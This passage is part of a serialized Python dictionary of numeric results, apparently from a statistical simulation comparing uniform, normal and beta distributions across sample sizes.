0.14363241010985406, 'beta1': 0.1212028739293255, 'beta2': 0.16502734817092168, 'beta4': 0.10950972011591287}, 150: {'uni': 0.1417718900803699, 'nor': 0.1593838233572799, 'beta1': 0.14050415423056511, 'beta2': 0.17994840692557712, 'beta4': 0.12734797519473529}, 100: {'uni': 0.17071272759843154, 'nor': 0.18620924221751517, 'beta1': 0.1694943482147639, 'beta2': 0.2061617674979867, 'beta4': 0.15839016146732976}, 75: {'uni': 0.19584271511298973, 'nor': 0.2093370290072297, 'beta1': 0.19718572391483902, 'beta2': 0.23127370158834348, 'beta4': 0.18832549889256817}, 50: {'uni': 0.2373732051332261, 'nor': 0.2525943440552235, 'beta1': 0.24061212793870418, 'beta2': 0.26576036413576276, 'beta4': 0.23083689372432803}, 30: {'uni': 0.3100041602252892, 'nor': 0.3259233331503591, 'beta1': 0.3043992784905107, 'beta2': 0.32847104261195337, 'beta4': 0.2976093515050148}, 20: {'uni': 0.37875813326972396, 'nor': 0.38421934320745366, 'beta1': 0.36904579022730116, 'beta2': 0.39257091754456774, 'beta4': 0.3714918858680628}, 10: {'uni': 0.5256130005835765, 'nor': 0.5146313247332729, 
'beta1': 0.5154354512884594, 'beta2': 0.5236551729483561, 'beta4': 0.5171483868755382}}, 200: {1000: {'uni': 0.054823062468771444, 'nor': 0.10237608718650248, 'beta1': 0.054913425269282445, 'beta2': 0.13753066984524742, 'beta4': 0.04306065777641055}, 750: {'uni': 0.06303781952610477, 'nor': 0.107566183991327, 'beta1': 0.06420595175095856, 'beta2': 0.14051764144651235, 'beta4': 0.05083566221768343}, 500: {'uni': 0.077773467688739, 'nor': 0.11742486043919942, 'beta1': 0.07700877908013115, 'beta2': 0.1511127593960866, 'beta4': 0.06280694981838986}, 400: {'uni': 0.08746277637091704, 'nor': 0.12365577953156803, 'beta1': 0.08541014292804638, 'beta2': 0.15608748317289656, 'beta4': 0.07176746331816469}, 300: {'uni': 0.09874368980037385, 'nor': 0.13279799940406578, 'beta1': 0.10063727053662885, 'beta2': 0.16469825347196948, 'beta4': 0.08447571374140178}, 200: {'uni': 0.12147398047991875, 'nor': 0.15113252491099077, 'beta1': 0.1200711704573576, 'beta2': 0.1773291927975813, 'beta4': 0.10795683062214101}, 150: {'uni': 0.1362385673420503, 'nor': 0.16821153015139878, 'beta1': 0.1413420271907294, 'beta2': 0.19069570391948212, 'beta4': 0.12371945303991366}, 100: {'uni': 0.17191169006549945, 'nor': 0.1915000329509956, 'beta1': 0.16877716420631123, 'beta2': 0.21536781735389232, 'beta4': 0.15634386366388436}, 75: {'uni': 0.19768216860175636, 'nor': 0.21811329268682084, 'beta1': 0.1944362202006149, 'beta2': 0.23468699165444767, 'beta4': 0.18438491874181984}, 50: {'uni': 0.24173902870459993, 'nor': 0.25892138695111544, 'beta1': 0.23935110326757852, 'beta2': 0.2736926533593288, 'beta4': 0.2305071196963152}, 30: {'uni': 0.3056290673196859, 'nor': 0.31961597063487057, 'beta1': 0.30685624740134015, 'beta2': 0.3314946124079916, 'beta4': 0.2962690398405605}, 20: {'uni': 0.37503602220656485, 'nor': 0.38582014314039126, 'beta1': 0.37033940847339836, 'beta2': 0.394855889549228, 'beta4': 0.3632513574058299}, 10: {'uni': 0.5219475742101427, 'nor': 0.5273558177210325, 'beta1': 0.5179563071106704, 
'beta2': 0.5223280464261697, 'beta4': 0.508754397926185}}, 150: {1000: {'uni': 0.05497081944724275, 'nor': 0.11293866805236763, 'beta1': 0.054515515093092715, 'beta2': 0.14887668708582957, 'beta4': 0.0423526366673494}, 750: {'uni': 0.06272727255199112, 'nor': 0.11935685094462867, 'beta1': 0.06302161535014611, 'beta2': 0.15422727456751978, 'beta4': 0.05010677582182044}, 500: {'uni': 0.07783890547759603, 'nor': 0.12892780402185094, 'beta1': 0.07679900717257704, 'beta2': 0.1584491203937134, 'beta4': 0.06222703641019131}, 400: {'uni': 0.08619692493811398, 'nor': 0.13460267386562202, 'beta1': 0.08498682818675518, 'beta2': 0.16069418726755758, 'beta4': 0.07050071410282907}, 300: {'uni': 0.0997903074389076, 'nor': 0.1434928646404363, 'beta1': 0.09987792658944261, 'beta2': 0.1712581767153427, 'beta4': 0.08388928555633074}, 200: {'uni': 0.1229636584423498, 'nor': 0.16127335693854156, 'beta1': 0.12179318587940297, 'beta2': 0.18650787549305375, 'beta4': 0.10364099823577061}, 150: {'uni': 0.13950034070955347, 'nor': 0.17459656922463157, 'beta1': 0.13855391323541408, 'beta2': 0.19837515491552643, 'beta4': 0.12275345243127289}, 100: {'uni': 0.1721101997017661, 'nor': 0.20046992755603654, 'beta1': 0.17021665164027383, 'beta2': 0.22211280446894255, 'beta4': 0.15546389829003454}, 75: {'uni': 0.1991174934620939, 'nor': 0.22331372517586023, 'beta1': 0.1962104983206956, 'beta2': 0.24060724420863722, 'beta4': 0.17937743495141684}, 50: {'uni': 0.23946193200510502, 'nor': 0.25716770411393886, 'beta1': 0.2418907692375714, 'beta2': 0.27698760128146055, 'beta4': 0.22462197378366977}, 30: {'uni': 0.3048167499504834, 'nor': 0.3224164981392731, 'beta1': 0.30917669628791133, 'beta2': 0.3397217885796864, 'beta4': 0.2951530259916931}, 20: {'uni': 0.3730336363648902, 'nor': 0.392045571478165, 'beta1': 0.37260044052109287, 'beta2': 0.3959432577708598, 'beta4': 0.36505805948899306}, 10: {'uni': 0.5205895094295567, 'nor': 0.5200665477634308, 'beta1': 0.5169539616971102, 'beta2': 0.5378667745281579, 
'beta4': 0.5122123299658353}}, 100: {1000: {'uni': 0.054671905903051154, 'nor': 0.13620477958130078, 'beta1': 0.054448380411697084, 'beta2': 0.156407609946504, 'beta4': 0.04258031568291154}, 750: {'uni': 0.06266207206914232, 'nor': 0.13888439278405296, 'beta1': 0.06271791632667584, 'beta2': 0.16566678573632287, 'beta4': 0.0482925234291825}, 500: {'uni': 0.0775012675871265, 'nor': 0.14584060351193762, 'beta1': 0.07690888604663815, 'beta2': 0.16862882144382407, 'beta4': 0.06119566013646921}, 400: {'uni': 0.08612080986238169, 'nor': 0.1524884087949958, 'beta1': 0.08594295867668089, 'beta2': 0.17546187004121272, 'beta4': 0.06890296067565604}, 300: {'uni': 0.09914477687385226, 'nor': 0.16047382364230972, 'beta1': 0.09975824624614843, 'beta2': 0.18295548537415873, 'beta4': 0.08159044925727432}, 200: {'uni': 0.12159165562809493, 'nor': 0.1749465483291479, 'beta1': 0.12382445050344149, 'beta2': 0.19490495485248804, 'beta4': 0.10001305394379784}, 150: {'uni': 0.14077933594023823, 'nor': 0.18899798332431184, 'beta1': 0.1392565038337702, 'beta2': 0.20870351777500962, 'beta4': 0.1201824703566371}, 100: {'uni': 0.17056823279090622, 'nor': 0.21428849869387473, 'beta1': 0.1691699130978257, 'beta2': 0.23043861580390712, 'beta4': 0.1516000664543985}, 75: {'uni': 0.19663636725395228, 'nor': 0.2363567433663108, 'beta1': 0.19691891448710852, 'beta2': 0.2503172522739228, 'beta4': 0.17491986059664721}, 50: {'uni': 0.23826972176926864, 'nor': 0.27685077279441733, 'beta1': 0.23825989017305044, 'beta2': 0.2868672428900947, 'beta4': 0.21882117630157366}, 30: {'uni': 0.31201675069446144, 'nor': 0.3343598643931398, 'beta1': 0.3060809831180182, 'beta2': 0.3440276319271851, 'beta4': 0.29233201067867287}, 20: {'uni': 0.3759351158966905, 'nor': 0.398490239918883, 'beta1': 0.38101245327903976, 'beta2': 0.39923128747203945, 'beta4': 0.3603116968657404}, 10: {'uni': 0.5196174604512347, 'nor': 0.5370629326824977, 'beta1': 0.5227401105260507, 'beta2': 0.5353245869799641, 'beta4': 0.5038900663854036}}, 
75: {1000: {'uni': 0.05581476206336089, 'nor': 0.14996311847318278, 'beta1': 0.05365675549099019, 'beta2': 0.17055018709179848, 'beta4': 0.04193211124195961}, 750: {'uni': 0.06309942452483619, 'nor': 0.15522283922657953, 'beta1': 0.06265439072142831, 'beta2': 0.17240879861617764, 'beta4': 0.048386543332347154}, 500: {'uni': 0.07754087582450486, 'nor': 0.16332486956676168, 'beta1': 0.07743582625568735, 'beta2': 0.17781956208843652, 'beta4': 0.059938160945287436}, 400: {'uni': 0.0859009285413197, 'nor': 0.16455528208539544, 'beta1': 0.0859009551340934, 'beta2': 0.18121441364820234, 'beta4': 0.06915251664696331}, 300: {'uni': 0.09986347174843568, 'nor': 0.1761029972514011, 'beta1': 0.0985448164318779, 'beta2': 0.19063671853439235, 'beta4': 0.07940996126345179}, 200: {'uni': 0.1219446322586436, 'nor': 0.19088686764778073, 'beta1': 0.12203985328563413, 'beta2': 0.20221466589744463, 'beta4': 0.09911706486857708}, 150: {'uni': 0.14134327292980867, 'nor': 0.2075824873820286, 'beta1': 0.13918231909157353, 'beta2': 0.21544497996445033, 'beta4': 0.11793244074486325}, 100: {'uni': 0.1687636072286217, 'nor': 0.22966914010762518, 'beta1': 0.17145469012205217, 'beta2': 0.2386137561260998, 'beta4': 0.14523799945462573}, 75: {'uni': 0.19703843729601045, 'nor': 0.2452280144193495, 'beta1': 0.19774506037472683, 'beta2': 0.2578913259496163, 'beta4': 0.17331141348235535}, 50: {'uni': 0.23561918913475827, 'nor': 0.28225307485813256, 'beta1': 0.23938641208932598, 'beta2': 0.2860719183825794, 'beta4': 0.2152316198436074}, 30: {'uni': 0.3063193649262127, 'nor': 0.3405329572940864, 'beta1': 0.30716509640473844, 'beta2': 0.34335563947301895, 'beta4': 0.28587386510907925}, 20: {'uni': 0.3767551692150056, 'nor': 0.4031495423576498, 'beta1': 0.37352751762215214, 'beta2': 0.4017493254898249, 'beta4': 0.351543039258803}, 10: {'uni': 0.5135684852674217, 'nor': 0.5436208094855315, 'beta1': 0.5192701884000489, 'beta2': 0.541210448929448, 'beta4': 0.5038013131913337}}, 50: {1000: {'uni': 
0.057842757890233965, 'nor': 0.176724096627361, 'beta1': 0.05408363038722486, 'beta2': 0.1893425096945247, 'beta4': 0.04177685643849072}, 750: {'uni': 0.06538542437484401, 'nor': 0.18526810074262368, 'beta1': 0.06262861062085978, 'beta2': 0.19081050404679278, 'beta4': 0.048138028850044035}, 500: {'uni': 0.0792274657176204, 'nor': 0.19075398241126212, 'beta1': 0.0781712308607096, 'beta2': 0.19703705491038603, 'beta4': 0.0588888677259701}, 400: {'uni': 0.08735181776995748, 'nor': 0.19733138997918653, 'beta1': 0.08671034907348185, 'beta2': 0.2029356394631182, 'beta4': 0.066356031342088}, 300: {'uni': 0.10038917910081224, 'nor': 0.2029037006087926, 'beta1': 0.09984458469801827, 'beta2': 0.2063407376940214, 'beta4': 0.07823225938947853}, 200: {'uni': 0.12225034725079975, 'nor': 0.21748256503914343, 'beta1': 0.12127009856496679, 'beta2': 0.21298920413518108, 'beta4': 0.09725242174322574}, 150: {'uni': 0.13784882603896337, 'nor': 0.2249234497071243, 'beta1': 0.142780623344778, 'beta2': 0.22771126781508755, 'beta4': 0.11232814682225023}, 100: {'uni': 0.1714971001027576, 'nor': 0.25130430723045216, 'beta1': 0.17149311831470596, 'beta2': 0.24575615134422085, 'beta4': 0.14352315798485257}, 75: {'uni': 0.19880624921564277, 'nor': 0.26882383206094734, 'beta1': 0.19913517567203842, 'beta2': 0.26323216252272097, 'beta4': 0.16694848958957278}, 50: {'uni': 0.24301893705195066, 'nor': 0.30053473330563535, 'beta1': 0.2437319298178, 'beta2': 0.2954722207006947, 'beta4': 0.21057399371569013}, 30: {'uni': 0.3061807816995066, 'nor': 0.3627984661916076, 'beta1': 0.30909416778391374, 'beta2': 0.35432147654309276, 'beta4': 0.28138283811427534}, 20: {'uni': 0.3762292155636904, 'nor': 0.4143457355174486, 'beta1': 0.37003582598685447, 'beta2': 0.417463947271284, 'beta4': 0.35099161339155716}, 10: {'uni': 0.5146354857060667, 'nor': 0.5544668904963077, 'beta1': 0.5140864742286797, 'beta2': 0.5502638339716877, 'beta4': 0.5028168394982335}}, 30: {1000: {'uni': 0.06167755027974642, 'nor': 
0.23144501325358247, 'beta1': 0.05443549286004057, 'beta2': 0.21030902628970505, 'beta4': 0.04112353109993838}, 750: {'uni': 0.06986464831340056, 'nor': 0.23157834653825105, 'beta1': 0.06298033424844018, 'beta2': 0.216023883145685, 'beta4': 0.04803956198514081}, 500: {'uni': 0.08291783316058687, 'nor': 0.23718889406318566, 'beta1': 0.07704332442547329, 'beta2': 0.21732439854980712, 'beta4': 0.059507078517589906}, 400: {'uni': 0.09066454957494724, 'nor': 0.24292620517074537, 'beta1': 0.08498286362579072, 'beta2': 0.22266027695887336, 'beta4': 0.06609086320354882}, 300: {'uni': 0.10418406038463879, 'nor': 0.2475908290265445, 'beta1': 0.10110680990030668, 'beta2': 0.2275142158690745, 'beta4': 0.07602884420540873}, 200: {'uni': 0.12340725206644898, 'nor': 0.2577901680164382, 'beta1': 0.12378156154379666, 'beta2': 0.23814817788828757, 'beta4': 0.0942162762280091}, 150: {'uni': 0.14201468529779537, 'nor': 0.2714996335714514, 'beta1': 0.14041437088952297, 'beta2': 0.24705628359301424, 'beta4': 0.1115326221157299}, 100: {'uni': 0.17156911043689577, 'nor': 0.2910591493981809, 'beta1': 0.17229628287565757, 'beta2': 0.26827556800042573, 'beta4': 0.1379958628810278}, 75: {'uni': 0.19484440138573444, 'nor': 0.30551022793589416, 'beta1': 0.19665653140894246, 'beta2': 0.2834507380462248, 'beta4': 0.16309095353377234}, 50: {'uni': 0.2410672107187225, 'nor': 0.33499572655115767, 'beta1': 0.24405909195603415, 'beta2': 0.31230260400439824, 'beta4': 0.2051899383337094}, 30: {'uni': 0.30479652249512135, 'nor': 0.38800092181160023, 'beta1': 0.30744408184030536, 'beta2': 0.3593455522789838, 'beta4': 0.27314032884799155}, 20: {'uni': 0.37449454977510127, 'nor': 0.4460662326088321, 'beta1': 0.3700752962830209, 'beta2': 0.4167874835239967, 'beta4': 0.3384436437562991}, 10: {'uni': 0.5116314558801505, 'nor': 0.5755223794724841, 'beta1': 0.5150076058914129, 'beta2': 0.5514563941928305, 'beta4': 0.4917892863434117}}, 20: {1000: {'uni': 0.06959685300772211, 'nor': 0.28757410567549513, 'beta1': 
0.053953981515175053, 'beta2': 0.23479744605814812, 'beta4': 0.04068104631305974}, 750: {'uni': 0.07583228548956522, 'nor': 0.2893885231958583, 'beta1': 0.06269020138133452, 'beta2': 0.2398017512195938, 'beta4': 0.0477206084818706}, 500: {'uni': 0.08760381160767208, 'nor': 0.2873807845879558, 'beta1': 0.07722766319523955, 'beta2': 0.24182381981064882, 'beta4': 0.05857000112490568}, 400: {'uni': 0.09700627334635992, 'nor': 0.2945018063796199, 'beta1': 0.08605947968141531, 'beta2': 0.2454067726287148, 'beta4': 0.0658297775312253}, 300: {'uni': 0.10812260594449896, 'nor': 0.3044832061482207, 'beta1': 0.09982313247817287, 'beta2': 0.25311285877382617, 'beta4': 0.07470120923689594}, 200: {'uni': 0.13067538774601684, 'nor': 0.307381114817036, 'beta1': 0.1207002057565804, 'beta2': 0.26262764232583313, 'beta4': 0.09381753824822037}, 150: {'uni': 0.1437519246686677, 'nor': 0.3206091659846585, 'beta1': 0.13867393280816304, 'beta2': 0.265394034224661, 'beta4': 0.10931783353586122}, 100: {'uni': 0.17189740592688724, 'nor': 0.3280544098249214, 'beta1': 0.16810853258661185, 'beta2': 0.2803147606488574, 'beta4': 0.13269638171126513}, 75: {'uni': 0.2003549991132838, 'nor': 0.34489520732083756, 'beta1': 0.19657825911151428, 'beta2': 0.29584161685011867, 'beta4': 0.15555948793153623}, 50: {'uni': 0.24046928357188047, 'nor': 0.3831682316031932, 'beta1': 0.24031547155678468, 'beta2': 0.3259770855267306, 'beta4': 0.19629711424440732}, 30: {'uni': 0.3080680301232709, 'nor': 0.42303226265926963, 'beta1': 0.30509121084648144, 'beta2': 0.37610727416155765, 'beta4': 0.2609876476177542}, 20: {'uni': 0.373297668166573, 'nor': 0.475814762443992, 'beta1': 0.3757648466315679, 'beta2': 0.42264940499356346, 'beta4': 0.3284256078618326}, 10: {'uni': 0.5140039283349758, 'nor': 0.5950313110777266, 'beta1': 0.5170351561226657, 'beta2': 0.555063447840049, 'beta4': 0.473618190051116}}, 10: {1000: {'uni': 0.1000131525742068, 'nor': 0.409864047721089, 'beta1': 0.09113480290581626, 'beta2': 
0.2804979904810423, 'beta4': 0.04087846848948132}, 750: {'uni': 0.10360258940868095, 'nor': 0.41929372322534414, 'beta1': 0.09114741734335415, 'beta2': 0.28114038955842613, 'beta4': 0.0477679066813847}, 500: {'uni': 0.11195961020305714, 'nor': 0.4157829085773251, 'beta1': 0.09126098733586951, 'beta2': 0.28657849318925166, 'beta4': 0.058399050643070494}, 400: {'uni': 0.11729638239795848, 'nor': 0.4260504597395027, 'beta1': 0.09154740289766372, 'beta2': 0.28504911455818494, 'beta4': 0.06534589576597083}, 300: {'uni': 0.12830729394341506, 'nor': 0.4205120474737974, 'beta1': 0.10096554208890152, 'beta2': 0.2936910855153506, 'beta4': 0.075492287165148}, 200: {'uni': 0.14515187402988394, 'nor': 0.435914384534595, 'beta1': 0.12215037845816623, 'beta2': 0.2981966625105821, 'beta4': 0.09167242348680918}, 150: {'uni': 0.15934251639018754, 'nor': 0.4395473221709565, 'beta1': 0.14085779880718263, 'beta2': 0.31177123240394505, 'beta4': 0.10719443660940275}, 100: {'uni': 0.18512635552666046, 'nor': 0.4563048193604518, 'beta1': 0.16884027642286348, 'beta2': 0.3151628444983027, 'beta4': 0.12974440442356955}, 75: {'uni': 0.2071031402154928, 'nor': 0.46661064860968665, 'beta1': 0.19804032027111418, 'beta2': 0.33533567264141617, 'beta4': 0.15103905584519184}, 50: {'uni': 0.24733757785161503, 'nor': 0.48136759185068323, 'beta1': 0.2403341444387983, 'beta2': 0.3594046504015401, 'beta4': 0.1890136163469433}, 30: {'uni': 0.3069533690198551, 'nor': 0.5223418943718963, 'beta1': 0.30599677039266915, 'beta2': 0.3983639241051619, 'beta4': 0.2534266062192869}, 20: {'uni': 0.3735600858621225, 'nor': 0.5590331645199271, 'beta1': 0.3745545851840409, 'beta2': 0.44871940334430627, 'beta4': 0.309129001754901}, 10: {'uni': 0.5079603855850016, 'nor': 0.6714692142813454, 'beta1': 0.5137289273763032, 'beta2': 0.5696425643135812, 'beta4': 0.45864540314219915}}}, 0.01: {1000: {1000: {'uni': 0.05129485367689102, 'nor': 0.06281083509171664, 'beta1': 0.05107806686939176, 'beta2': 0.10147434204599137, 
'beta4': 0.04481834422995701}, 750: {'uni': 0.05933719566503981, 'nor': 0.07044954783713647, 'beta1': 0.05907830933987235, 'beta2': 0.10443582378448724, 'beta4': 0.05337370850693279}, 500: {'uni': 0.07297584959697972, 'nor': 0.08154345761298731, 'beta1': 0.07271983245642422, 'beta2': 0.11266519507619366, 'beta4': 0.06585853402432429}, 400: {'uni': 0.08090786389591842, 'nor': 0.08992168016454061, 'beta1': 0.08128421415396725, 'beta2': 0.11609404475794888, 'beta4': 0.07649643394160888}, 300: {'uni': 0.09388546103833217, 'nor': 0.09955321885077567, 'beta1': 0.09345709665753016, 'beta2': 0.12649006695142406, 'beta4': 0.08841359390615178}, 200: {'uni': 0.11353626166629766, 'nor': 0.12048393062982926, 'beta1': 0.11474986795545838, 'beta2': 0.14179352445516558, 'beta4': 0.10994312621177804}, 150: {'uni': 0.1327942158900352, 'nor': 0.13672326054920736, 'beta1': 0.13088297498674817, 'beta2': 0.15495612418375992, 'beta4': 0.12759146981003233}, 100: {'uni': 0.16208800134443502, 'nor': 0.1634608738492047, 'beta1': 0.16483383061835577, 'beta2': 0.179293345468783, 'beta4': 0.15587772291645302}, 75: {'uni': 0.18573927578217658, 'nor': 0.18826509813153808, 'beta1': 0.18535362149382184, 'beta2': 0.20246761284986203, 'beta4': 0.18363587582052376}, 50: {'uni': 0.22602880452129426, 'nor': 0.22721053058692026, 'beta1': 0.22647423560537766, 'beta2': 0.24132302056400629, 'beta4': 0.22214505424144632}, 30: {'uni': 0.2866957560674456, 'nor': 0.29122835505552935, 'beta1': 0.2929636790178528, 'beta2': 0.30200243653413883, 'beta4': 0.2919094262056585}, 20: {'uni': 0.35528611293244305, 'nor': 0.35294865538334086, 'beta1': 0.35330451666561385, 'beta2': 0.3561690331631435, 'beta4': 0.3471108536518231}, 10: {'uni': 0.4898429521852865, 'nor': 0.48995064698146334, 'beta1': 0.4916404496017533, 'beta2': 0.49434298684781663, 'beta4': 0.48152800061187356}}, 750: {1000: {'uni': 0.051534656619642405, 'nor': 0.06661040036430238, 'beta1': 0.05119210087714571, 'beta2': 0.1017170167766821, 'beta4': 
0.04405968156885359}, 750: {'uni': 0.059392840143921544, 'nor': 0.07295941378208323, 'beta1': 0.0593079696092893, 'beta2': 0.10498534334941645, 'beta4': 0.05213727865509954}, 500: {'uni': 0.07232105894578911, 'nor': 0.0845454668484768, 'beta1': 0.07269799849643532, 'beta2': 0.1124804653100443, 'beta4': 0.06550213106063163}, 400: {'uni': 0.08051435061250778, 'nor': 0.09174262237208586, 'beta1': 0.0814260013663316, 'beta2': 0.11733914354575858, 'beta4': 0.07417771351439317}, 300: {'uni': 0.09264055215696232, 'nor': 0.10295017205097534, 'beta1': 0.09346566052436689, 'beta2': 0.12655756797177392, 'beta4': 0.08787578197242896}, 200: {'uni': 0.11483671598870576, 'nor': 0.12366825601571851, 'beta1': 0.11322629942862356, 'beta2': 0.14042506799186272, 'beta4': 0.10722297353789534}, 150: {'uni': 0.13158644004287812, 'nor': 0.1389969192433652, 'beta1': 0.13055409411440705, 'beta2': 0.15647066832130707, 'beta4': 0.12705846586847036}, 100: {'uni': 0.16186652500083287, 'nor': 0.1673332759029187, 'beta1': 0.16128287338366937, 'beta2': 0.18038226627656384, 'beta4': 0.15611827317289068}, 75: {'uni': 0.18764543571574965, 'nor': 0.19095691792223274, 'beta1': 0.18794282479122293, 'beta2': 0.20449321398176196, 'beta4': 0.18061820709529477}, 50: {'uni': 0.226171463050115, 'nor': 0.2289935327391464, 'beta1': 0.22801373082023235, 'beta2': 0.24150428904957089, 'beta4': 0.22665004770368552}, 30: {'uni': 0.28965332928325704, 'nor': 0.29481852702352496, 'beta1': 0.29443285351219906, 'beta2': 0.30448017108169273, 'beta4': 0.2841177753703454}, 20: {'uni': 0.35303732347834804, 'nor': 0.35175872269014363, 'beta1': 0.3488588172685543, 'beta2': 0.36473759502844405, 'beta4': 0.3489149265132695}, 10: {'uni': 0.48746885638524173, 'nor': 0.48910846637687666, 'beta1': 0.4854441287384354, 'beta2': 0.499312939413207, 'beta4': 0.4820854775286469}}, 500: {1000: {'uni': 0.05070668798111183, 'nor': 0.07307564348735107, 'beta1': 0.05136358571645222, 'beta2': 0.10754414306745141, 'beta4': 0.04335466469142435}, 
750: {'uni': 0.05930859802961075, 'nor': 0.07913755555471735, 'beta1': 0.058713049033531806, 'beta2': 0.11202765188630714, 'beta4': 0.05072594836982958}, 500: {'uni': 0.07250391695991487, 'nor': 0.08997714013244151, 'beta1': 0.07217245096062674, 'beta2': 0.11976047636593312, 'beta4': 0.06369794357960606}, 400: {'uni': 0.08087401871675737, 'nor': 0.09762299221558252, 'beta1': 0.08126385640568756, 'beta2': 0.12524922843485486, 'beta4': 0.07246464421624788}, 300: {'uni': 0.09286272646331206, 'nor': 0.10639090401076873, 'beta1': 0.09360831758476895, 'beta2': 0.13480385220989233, 'beta4': 0.08484641064573195}, 200: {'uni': 0.11369861261647718, 'nor': 0.1259649259062341, 'beta1': 0.11535049725347946, 'beta2': 0.15023672569159274, 'beta4': 0.10654459673560468}, 150: {'uni': 0.13094331807012105, 'nor': 0.1419771822231538, 'beta1': 0.13242263806323107, 'beta2': 0.16312614939587444, 'beta4': 0.12204776890498104}, 100: {'uni': 0.16010520707772924, 'nor': 0.16829119335024995, 'beta1': 0.161780824516852, 'beta2': 0.1845635350197833, 'beta4': 0.15500764249014892}, 75: {'uni': 0.18569722037995617, 'nor': 0.19404858222754012, 'beta1': 0.18353587169284724, 'beta2': 0.21024744989486982, 'beta4': 0.18093047276834628}, 50: {'uni': 0.2249952534487163, 'nor': 0.23470807584810854, 'beta1': 0.22394207853083203, 'beta2': 0.24369571318319788, 'beta4': 0.22404400464903013}, 30: {'uni': 0.28922639988339793, 'nor': 0.29694440849160253, 'beta1': 0.28930513852142603, 'beta2': 0.3061086815618318, 'beta4': 0.28197149415512585}, 20: {'uni': 0.3532159395936194, 'nor': 0.3594610656143175, 'beta1': 0.35424253066365413, 'beta2': 0.3629738556479084, 'beta4': 0.34892709778660913}, 10: {'uni': 0.49319776417333205, 'nor': 0.4919346045056977, 'beta1': 0.4914053992328329, 'beta2': 0.4956418018212609, 'beta4': 0.48866367027428953}}, 400: {1000: {'uni': 0.05171872696982288, 'nor': 0.0779968485408219, 'beta1': 0.05125234103750187, 'beta2': 0.10749424790797857, 'beta4': 0.04243112506333324}, 750: {'uni': 
0.05942664915165613, 'nor': 0.08278471622725792, 'beta1': 0.059045226639506954, 'beta2': 0.11246496346057688, 'beta4': 0.049669130629863556}, 500: {'uni': 0.07189692356904676, 'nor': 0.09361598801023086, 'beta1': 0.0721804928498383, 'beta2': 0.11937872756887818, 'beta4': 0.06327011110935565}, 400: {'uni': 0.08084614058304584, 'nor': 0.10080942415469252, 'beta1': 0.0797135489432822, 'beta2': 0.1257152874686207, 'beta4': 0.07054543139847541}, 300: {'uni': 0.09394710441562093, 'nor': 0.10983774809278396, 'beta1': 0.09317847768978005, 'beta2': 0.13400641076171205, 'beta4': 0.08372788015883226}, 200: {'uni': 0.11516939973345491, 'nor': 0.1279698675017119, 'beta1': 0.11283277809965603, 'beta2': 0.14878256141575052, 'beta4': 0.10481300302685173}, 150: {'uni': 0.13103481700869724, 'nor': 0.14459734582575978, 'beta1': 0.13109809480602197, 'beta2': 0.1634096298903665, 'beta4': 0.1224780784738968}, 100: {'uni': 0.1610805901347358, 'nor': 0.16904015329738042, 'beta1': 0.1602232613963524, 'beta2': 0.1874426452084551, 'beta4': 0.15348776308096057}, 75: {'uni': 0.18177371768073364, 'nor': 0.19670702076359703, 'beta1': 0.1844925024391989, 'beta2': 0.2105191447384148, 'beta4': 0.17783506013311623}, 50: {'uni': 0.2252328815143954, 'nor': 0.231721726836716, 'beta1': 0.22366230144945903, 'beta2': 0.24781167529857046, 'beta4': 0.21942405296052814}, 30: {'uni': 0.28864743546145355, 'nor': 0.2970598210895456, 'beta1': 0.2893646586257687, 'beta2': 0.30151561161895035, 'beta4': 0.2852000453369167}, 20: {'uni': 0.3560880816420639, 'nor': 0.35816852147038125, 'beta1': 0.3587921441788674, 'beta2': 0.3713605213188108, 'beta4': 0.3507319434269337}, 10: {'uni': 0.48715561247362865, 'nor': 0.491578769317442, 'beta1': 0.4763429028968493, 'beta2': 0.5009132622576649, 'beta4': 0.4858863544709412}}, 300: {1000: {'uni': 0.05116236960288739, 'nor': 0.08362687693280035, 'beta1': 0.051368373495024544, 'beta2': 0.11446474352863178, 'beta4': 0.04119784019711356}, 750: {'uni': 0.05993893748144197, 'nor': 
0.088975002045106, 'beta1': 0.05945536094744841, 'beta2': 0.1192867892763042, 'beta4': 0.04845162600368419}, 500: {'uni': 0.07274728302306016, 'nor': 0.09828413734395919, 'beta1': 0.07212817693643503, 'beta2': 0.12627777617615477, 'beta4': 0.06160395430770016}, 400: {'uni': 0.08073474547539339, 'nor': 0.10507281592449369, 'beta1': 0.08024944641722576, 'beta2': 0.1303092084298162, 'beta4': 0.06982921110804863}, 300: {'uni': 0.09317526758440403, 'nor': 0.11705090342781177, 'beta1': 0.09315546513078332, 'beta2': 0.1399551702427777, 'beta4': 0.08158816157237775}, 200: {'uni': 0.11409958755150595, 'nor': 0.1314488095008084, 'beta1': 0.11453286833437615, 'beta2': 0.1567790320303898, 'beta4': 0.10362462756693636}, 150: {'uni': 0.130936819362498, 'nor': 0.1493233271345169, 'beta1': 0.13150912092144829, 'beta2': 0.169701096896674, 'beta4': 0.12193228046643229}, 100: {'uni': 0.16243451017422467, 'nor': 0.1757607427080965, 'beta1': 0.160383901558243, 'beta2': 0.19244715618473562, 'beta4': 0.1514647915916582}, 75: {'uni': 0.1853859134119128, 'nor': 0.1958997856947285, 'beta1': 0.18687394388066536, 'beta2': 0.21186212806019417, 'beta4': 0.17618375652600887}, 50: {'uni': 0.22498609458966784, 'nor': 0.23730546516440537, 'beta1': 0.22564497853587992, 'beta2': 0.25068612614680547, 'beta4': 0.22025976236280248}, 30: {'uni': 0.2883890795435333, 'nor': 0.29983573055446033, 'beta1': 0.2921073149317487, 'beta2': 0.3082785804677224, 'beta4': 0.28437957017383403}, 20: {'uni': 0.350662368824897, 'nor': 0.36066581276090837, 'beta1': 0.35036112927618646, 'beta2': 0.36698531659291206, 'beta4': 0.34399861518395175}, 10: {'uni': 0.48773425736194487, 'nor': 0.4897587539768351, 'beta1': 0.48597353289535955, 'beta2': 0.5016469184252377, 'beta4': 0.48930033694496555}}, 200: {1000: {'uni': 0.05099550061354963, 'nor': 0.09621002435011294, 'beta1': 0.05097248744906935, 'beta2': 0.1270148971959001, 'beta4': 0.04066696015503554}, 750: {'uni': 0.05897057501846892, 'nor': 0.10125250087843168, 'beta1': 
